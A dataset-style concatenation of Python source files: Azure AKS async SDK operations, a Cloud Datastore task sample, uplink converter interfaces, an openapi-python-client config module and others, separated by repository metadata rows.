pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('ManagedCluster', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('ManagedCluster', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}'} # type: ignore
@distributed_trace_async
async def begin_create_or_update(
self,
resource_group_name: str,
resource_name: str,
parameters: "_models.ManagedCluster",
**kwargs: Any
) -> AsyncLROPoller["_models.ManagedCluster"]:
"""Creates or updates a managed cluster.
Creates or updates a managed cluster with the specified configuration for agents and Kubernetes
version.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param resource_name: The name of the managed cluster resource.
:type resource_name: str
:param parameters: Parameters supplied to the Create or Update a Managed Cluster operation.
:type parameters: ~azure.mgmt.containerservice.v2020_04_01.models.ManagedCluster
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either ManagedCluster or the result of
cls(response)
:rtype:
~azure.core.polling.AsyncLROPoller[~azure.mgmt.containerservice.v2020_04_01.models.ManagedCluster]
:raises: ~azure.core.exceptions.HttpResponseError
"""
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
polling = kwargs.pop('polling', True) # type: Union[bool, azure.core.polling.AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.ManagedCluster"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._create_or_update_initial(
resource_group_name=resource_group_name,
resource_name=resource_name,
parameters=parameters,
content_type=content_type,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
response = pipeline_response.http_response
deserialized = self._deserialize('ManagedCluster', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = AsyncARMPolling(lro_delay, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}'} # type: ignore
async def _update_tags_initial(
self,
resource_group_name: str,
resource_name: str,
parameters: "_models.TagsObject",
**kwargs: Any
) -> "_models.ManagedCluster":
cls = kwargs.pop('cls', None) # type: ClsType["_models.ManagedCluster"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_json = self._serialize.body(parameters, 'TagsObject')
request = build_update_tags_request_initial(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
resource_name=resource_name,
content_type=content_type,
json=_json,
template_url=self._update_tags_initial.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('ManagedCluster', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_update_tags_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}'} # type: ignore
@distributed_trace_async
async def begin_update_tags(
self,
resource_group_name: str,
resource_name: str,
parameters: "_models.TagsObject",
**kwargs: Any
) -> AsyncLROPoller["_models.ManagedCluster"]:
"""Updates tags on a managed cluster.
Updates a managed cluster with the specified tags.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param resource_name: The name of the managed cluster resource.
:type resource_name: str
:param parameters: Parameters supplied to the Update Managed Cluster Tags operation.
:type parameters: ~azure.mgmt.containerservice.v2020_04_01.models.TagsObject
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either ManagedCluster or the result of
cls(response)
:rtype:
~azure.core.polling.AsyncLROPoller[~azure.mgmt.containerservice.v2020_04_01.models.ManagedCluster]
:raises: ~azure.core.exceptions.HttpResponseError
"""
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
polling = kwargs.pop('polling', True) # type: Union[bool, azure.core.polling.AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.ManagedCluster"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._update_tags_initial(
resource_group_name=resource_group_name,
resource_name=resource_name,
parameters=parameters,
content_type=content_type,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
response = pipeline_response.http_response
deserialized = self._deserialize('ManagedCluster', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = AsyncARMPolling(lro_delay, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_update_tags.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}'} # type: ignore
async def _delete_initial(
self,
resource_group_name: str,
resource_name: str,
**kwargs: Any
) -> None:
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_delete_request_initial(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
resource_name=resource_name,
template_url=self._delete_initial.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}'} # type: ignore
@distributed_trace_async
async def begin_delete(
self,
resource_group_name: str,
resource_name: str,
**kwargs: Any
) -> AsyncLROPoller[None]:
"""Deletes a managed cluster.
Deletes the managed cluster with a specified resource group and name.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param resource_name: The name of the managed cluster resource.
:type resource_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[None]
:raises: ~azure.core.exceptions.HttpResponseError
"""
polling = kwargs.pop('polling', True) # type: Union[bool, azure.core.polling.AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._delete_initial(
resource_group_name=resource_group_name,
resource_name=resource_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
if polling is True: polling_method = AsyncARMPolling(lro_delay, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}'} # type: ignore
async def _reset_service_principal_profile_initial(
self,
resource_group_name: str,
resource_name: str,
parameters: "_models.ManagedClusterServicePrincipalProfile",
**kwargs: Any
) -> None:
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_json = self._serialize.body(parameters, 'ManagedClusterServicePrincipalProfile')
request = build_reset_service_principal_profile_request_initial(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
resource_name=resource_name,
content_type=content_type,
json=_json,
template_url=self._reset_service_principal_profile_initial.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_reset_service_principal_profile_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/resetServicePrincipalProfile'} # type: ignore
@distributed_trace_async
async def begin_reset_service_principal_profile(
self,
resource_group_name: str,
resource_name: str,
parameters: "_models.ManagedClusterServicePrincipalProfile",
**kwargs: Any
) -> AsyncLROPoller[None]:
"""Reset Service Principal Profile of a managed cluster.
Update the service principal Profile for a managed cluster.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param resource_name: The name of the managed cluster resource.
:type resource_name: str
:param parameters: Parameters supplied to the Reset Service Principal Profile operation for a
Managed Cluster.
:type parameters:
~azure.mgmt.containerservice.v2020_04_01.models.ManagedClusterServicePrincipalProfile
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[None]
:raises: ~azure.core.exceptions.HttpResponseError
"""
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
polling = kwargs.pop('polling', True) # type: Union[bool, azure.core.polling.AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._reset_service_principal_profile_initial(
resource_group_name=resource_group_name,
resource_name=resource_name,
parameters=parameters,
content_type=content_type,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
if polling is True: polling_method = AsyncARMPolling(lro_delay, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_reset_service_principal_profile.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/resetServicePrincipalProfile'} # type: ignore
async def _reset_aad_profile_initial(
self,
resource_group_name: str,
resource_name: str,
parameters: "_models.ManagedClusterAADProfile",
**kwargs: Any
) -> None:
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_json = self._serialize.body(parameters, 'ManagedClusterAADProfile')
request = build_reset_aad_profile_request_initial(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
resource_name=resource_name,
content_type=content_type,
json=_json,
template_url=self._reset_aad_profile_initial.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_reset_aad_profile_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/resetAADProfile'} # type: ignore
@distributed_trace_async
async def begin_reset_aad_profile(
self,
resource_group_name: str,
resource_name: str,
parameters: "_models.ManagedClusterAADProfile",
**kwargs: Any
) -> AsyncLROPoller[None]:
"""Reset AAD Profile of a managed cluster.
Update the AAD Profile for a managed cluster.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param resource_name: The name of the managed cluster resource.
:type resource_name: str
:param parameters: Parameters supplied to the Reset AAD Profile operation for a Managed
Cluster.
:type parameters: ~azure.mgmt.containerservice.v2020_04_01.models.ManagedClusterAADProfile
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[None]
:raises: ~azure.core.exceptions.HttpResponseError
"""
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
polling = kwargs.pop('polling', True) # type: Union[bool, azure.core.polling.AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._reset_aad_profile_initial(
resource_group_name=resource_group_name,
resource_name=resource_name,
parameters=parameters,
content_type=content_type,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
if polling is True: polling_method = AsyncARMPolling(lro_delay, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_reset_aad_profile.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/resetAADProfile'} # type: ignore
async def _rotate_cluster_certificates_initial(
self,
resource_group_name: str,
resource_name: str,
**kwargs: Any
) -> None:
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_rotate_cluster_certificates_request_initial(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
resource_name=resource_name,
template_url=self._rotate_cluster_certificates_initial.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_rotate_cluster_certificates_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/rotateClusterCertificates'} # type: ignore
@distributed_trace_async
async def begin_rotate_cluster_certificates(
self,
resource_group_name: str,
resource_name: str,
**kwargs: Any
) -> AsyncLROPoller[None]:
"""Rotate certificates of a managed cluster.
Rotate certificates of a managed cluster.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param resource_name: The name of the managed cluster resource.
:type resource_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[None]
:raises: ~azure.core.exceptions.HttpResponseError
"""
polling = kwargs.pop('polling', True) # type: Union[bool, azure.core.polling.AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._rotate_cluster_certificates_initial(
resource_group_name=resource_group_name,
resource_name=resource_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
if polling is True: polling_method = AsyncARMPolling(lro_delay, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_rotate_cluster_certificates.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/rotateClusterCertificates'} # type: ignore
| 46.435702 | 598 | 0.682803 |
ace95a316f3a8e3f49e9d1945f46a839f9eff463 | 257 | py | Python | contrib/workflow/SpiffWorkflow/src/SpiffWorkflow/__init__.py | gonicus/clacks | da579f0acc4e48cf2e9451417ac6792282cf7ab6 | [
"ZPL-2.1"
] | 2 | 2015-01-26T07:15:19.000Z | 2015-11-09T13:42:11.000Z | contrib/workflow/SpiffWorkflow/src/SpiffWorkflow/__init__.py | gonicus/clacks | da579f0acc4e48cf2e9451417ac6792282cf7ab6 | [
"ZPL-2.1"
] | null | null | null | contrib/workflow/SpiffWorkflow/src/SpiffWorkflow/__init__.py | gonicus/clacks | da579f0acc4e48cf2e9451417ac6792282cf7ab6 | [
"ZPL-2.1"
] | null | null | null | from Job import Job
from Workflow import Workflow
from Exception import WorkflowException
from Task import Task
import inspect
__all__ = [name for name, obj in locals().items()
if not (name.startswith('_') or inspect.ismodule(obj))]
| 28.555556 | 66 | 0.712062 |
ace95ae2deb4221e526864a85408335c70a141ff | 3,775 | py | Python | datastore/cloud-client/tasks.py | TestShared-demo/python-docs-samples | c03bb27e87f50c31cd8b9e509dca2d0e0eec37ab | [
"Apache-2.0"
] | 1 | 2022-01-13T08:49:45.000Z | 2022-01-13T08:49:45.000Z | datastore/cloud-client/tasks.py | TestShared-demo/python-docs-samples | c03bb27e87f50c31cd8b9e509dca2d0e0eec37ab | [
"Apache-2.0"
] | 2 | 2020-05-05T05:16:18.000Z | 2020-05-18T08:16:38.000Z | datastore/cloud-client/tasks.py | TestShared-demo/python-docs-samples | c03bb27e87f50c31cd8b9e509dca2d0e0eec37ab | [
"Apache-2.0"
] | 1 | 2022-03-03T02:56:20.000Z | 2022-03-03T02:56:20.000Z | # Copyright 2016, Google, Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import datetime
# [START datastore_build_service]
from google.cloud import datastore
def create_client(project_id):
return datastore.Client(project_id)
# [END datastore_build_service]
# [START datastore_add_entity]
def add_task(client, description):
key = client.key("Task")
task = datastore.Entity(key, exclude_from_indexes=["description"])
task.update(
{
"created": datetime.datetime.utcnow(),
"description": description,
"done": False,
}
)
client.put(task)
return task.key
# [END datastore_add_entity]
# [START datastore_update_entity]
def mark_done(client, task_id):
with client.transaction():
key = client.key("Task", task_id)
task = client.get(key)
if not task:
raise ValueError(f"Task {task_id} does not exist.")
task["done"] = True
client.put(task)
# [END datastore_update_entity]
# [START datastore_retrieve_entities]
def list_tasks(client):
query = client.query(kind="Task")
query.order = ["created"]
return list(query.fetch())
# [END datastore_retrieve_entities]
# [START datastore_delete_entity]
def delete_task(client, task_id):
key = client.key("Task", task_id)
client.delete(key)
# [END datastore_delete_entity]
def format_tasks(tasks):
lines = []
for task in tasks:
if task["done"]:
status = "done"
else:
status = f"created {task['created']}"
lines.append(f"{task.key.id}: {task['description']} ({status})")
return "\n".join(lines)
def new_command(client, args):
"""Adds a task with description <description>."""
task_key = add_task(client, args.description)
print(f"Task {task_key.id} added.")
def done_command(client, args):
"""Marks a task as done."""
mark_done(client, args.task_id)
print(f"Task {args.task_id} marked done.")
def list_command(client, args):
"""Lists all tasks by creation time."""
print(format_tasks(list_tasks(client)))
def delete_command(client, args):
"""Deletes a task."""
delete_task(client, args.task_id)
print(f"Task {args.task_id} deleted.")
if __name__ == "__main__":
parser = argparse.ArgumentParser()
subparsers = parser.add_subparsers()
parser.add_argument("--project-id", help="Your cloud project ID.")
new_parser = subparsers.add_parser("new", help=new_command.__doc__)
new_parser.set_defaults(func=new_command)
new_parser.add_argument("description", help="New task description.")
done_parser = subparsers.add_parser("done", help=done_command.__doc__)
done_parser.set_defaults(func=done_command)
done_parser.add_argument("task_id", help="Task ID.", type=int)
list_parser = subparsers.add_parser("list", help=list_command.__doc__)
list_parser.set_defaults(func=list_command)
delete_parser = subparsers.add_parser("delete", help=delete_command.__doc__)
delete_parser.set_defaults(func=delete_command)
delete_parser.add_argument("task_id", help="Task ID.", type=int)
args = parser.parse_args()
client = create_client(args.project_id)
args.func(client, args)
| 25.506757 | 80 | 0.690331 |
ace95b463cb915d88effb57d891ebcfcc00aa0bc | 4,636 | py | Python | uplink/converters/interfaces.py | lust4life/uplink | 44d7dcce1b40029e325c831c9e5683c41081c524 | [
"MIT"
] | 918 | 2017-10-20T10:47:40.000Z | 2022-03-27T19:10:21.000Z | uplink/converters/interfaces.py | lust4life/uplink | 44d7dcce1b40029e325c831c9e5683c41081c524 | [
"MIT"
] | 248 | 2017-10-20T03:58:20.000Z | 2022-03-13T18:39:16.000Z | uplink/converters/interfaces.py | lust4life/uplink | 44d7dcce1b40029e325c831c9e5683c41081c524 | [
"MIT"
] | 66 | 2017-10-21T02:56:34.000Z | 2022-02-15T08:27:50.000Z | class Converter(object):
def convert(self, value):
raise NotImplementedError
def __call__(self, *args, **kwargs):
return self.convert(*args, **kwargs)
def set_chain(self, chain):
pass
class Factory(object):
"""
An adapter that handles serialization of HTTP request properties
(e.g., headers, query parameters, request body) and deserialization
of HTTP response bodies.
Each concrete implementation of this abstract class typically
encapsulates a specific encoding/decoding strategy
(e.g., Protocol Buffers or JSON).
.. note::
Overriding all inherited methods is unnecessary; the default
implementation is to return :obj:`None`, which tells the
converter layer to move on to the next factory. Hence,
you only should implement the methods you intend to support.
"""
def create_response_body_converter(self, cls, request_definition):
"""
Returns a callable that can convert a response body into the
specified :obj:`cls`.
The returned callable should expect a single positional
argument: the response body.
If this factory can't produce such a callable, it should return
:obj:`None`, so another factory can have a chance to handle
the type.
Args:
cls (:obj:`type`): The target class for conversion.
request_definition: Metadata for the outgoing request.
This object exposes two properties: the
:obj:`method_annotations` (e.g., `~uplink.headers`) and
:obj:`argument_annotations` (e.g., `~uplink.Body) bound
to the underlying consumer method
"""
def create_request_body_converter(self, cls, request_definition):
"""
Returns a callable that can convert :obj:`cls` into an acceptable
request body.
The returned callable should expect a single positional
argument: an instance of given type, :obj:`cls`.
If this factory can't produce such a callable, it should return
:py:obj:`None`, so another factory can have a chance to handle
the type.
Args:
cls (obj:`type`): The target class for conversion.
request_definition: Metadata for the outgoing request.
This object exposes two properties: the
:obj:`method_annotations` (e.g., `~uplink.headers`) and
:obj:`argument_annotations` (e.g., `~uplink.Body) bound
to the underlying consumer method
"""
def create_string_converter(self, cls, request_definition):
"""
Returns a callable that can convert `cls` into a
:py:class:`str`.
The returned callable should expect a single positional
argument: an instance of given type, :obj:`cls`.
If this factory can't produce such a callable, it should return
:py:obj:`None`, so another factory can have a chance to handle
the type.
Args:
cls (obj:`type`): The target class for conversion.
request_definition: Metadata for the outgoing request.
This object exposes two properties: the
:obj:`method_annotations` (e.g., `~uplink.headers`) and
:obj:`argument_annotations` (e.g., `~uplink.Body) bound
to the underlying consumer method
"""
class ConverterFactory(Factory):
# TODO: Remove this in v1.0.0 -- use Factory instead.
def create_response_body_converter(self, cls, request_definition):
return self.make_response_body_converter(
cls,
request_definition.argument_annotations,
request_definition.method_annotations,
)
def create_request_body_converter(self, cls, request_definition):
return self.make_request_body_converter(
cls,
request_definition.argument_annotations,
request_definition.method_annotations,
)
def create_string_converter(self, cls, request_definition):
return self.make_string_converter(
cls,
request_definition.argument_annotations,
request_definition.method_annotations,
)
def make_response_body_converter(
self, type, argument_annotations, method_annotations
):
pass
def make_request_body_converter(
self, type, argument_annotations, method_annotations
):
pass
def make_string_converter(
self, type, argument_annotations, method_annotations
):
pass
| 34.857143 | 73 | 0.643658 |
ace95c6b132e0b84fbc48ebefbd24d2562266758 | 1,436 | py | Python | openapi_python_client/config.py | oterrier/openapi-python-client | ca8acdbe34b11584143b78afc130684f0690d5bf | [
"MIT"
] | 172 | 2020-02-15T20:14:16.000Z | 2021-06-09T07:09:15.000Z | openapi_python_client/config.py | oterrier/openapi-python-client | ca8acdbe34b11584143b78afc130684f0690d5bf | [
"MIT"
] | 410 | 2020-02-15T19:39:29.000Z | 2021-06-09T19:28:57.000Z | openapi_python_client/config.py | oterrier/openapi-python-client | ca8acdbe34b11584143b78afc130684f0690d5bf | [
"MIT"
] | 38 | 2020-04-12T09:36:27.000Z | 2021-06-11T08:57:07.000Z | import json
import mimetypes
from pathlib import Path
from typing import Dict, List, Optional
import yaml
from pydantic import BaseModel
class ClassOverride(BaseModel):
"""An override of a single generated class.
See https://github.com/openapi-generators/openapi-python-client#class_overrides
"""
class_name: Optional[str] = None
module_name: Optional[str] = None
class Config(BaseModel):
"""Contains any configurable values passed by the user.
See https://github.com/openapi-generators/openapi-python-client#configuration
"""
class_overrides: Dict[str, ClassOverride] = {}
project_name_override: Optional[str]
package_name_override: Optional[str]
package_version_override: Optional[str]
post_hooks: List[str] = [
"autoflake -i -r --remove-all-unused-imports --remove-unused-variables --ignore-init-module-imports .",
"isort .",
"black .",
]
field_prefix: str = "field_"
@staticmethod
def load_from_path(path: Path) -> "Config":
"""Creates a Config from provided JSON or YAML file and sets a bunch of globals from it"""
mime = mimetypes.guess_type(path.absolute().as_uri(), strict=True)[0]
if mime == "application/json":
config_data = json.loads(path.read_text())
else:
config_data = yaml.safe_load(path.read_text())
config = Config(**config_data)
return config
| 30.553191 | 111 | 0.679666 |
ace95c9b9d430d0b0aac8745ae41e10938edc73d | 1,275 | py | Python | lib/galaxy_test/base/api_util.py | rhpvorderman/galaxy | 178015f8eff0b0c7a59c0d6756658f6428222837 | [
"CC-BY-3.0"
] | 1,085 | 2015-02-18T16:14:38.000Z | 2022-03-30T23:52:07.000Z | lib/galaxy_test/base/api_util.py | rhpvorderman/galaxy | 178015f8eff0b0c7a59c0d6756658f6428222837 | [
"CC-BY-3.0"
] | 11,253 | 2015-02-18T17:47:32.000Z | 2022-03-31T21:47:03.000Z | lib/galaxy_test/base/api_util.py | rhpvorderman/galaxy | 178015f8eff0b0c7a59c0d6756658f6428222837 | [
"CC-BY-3.0"
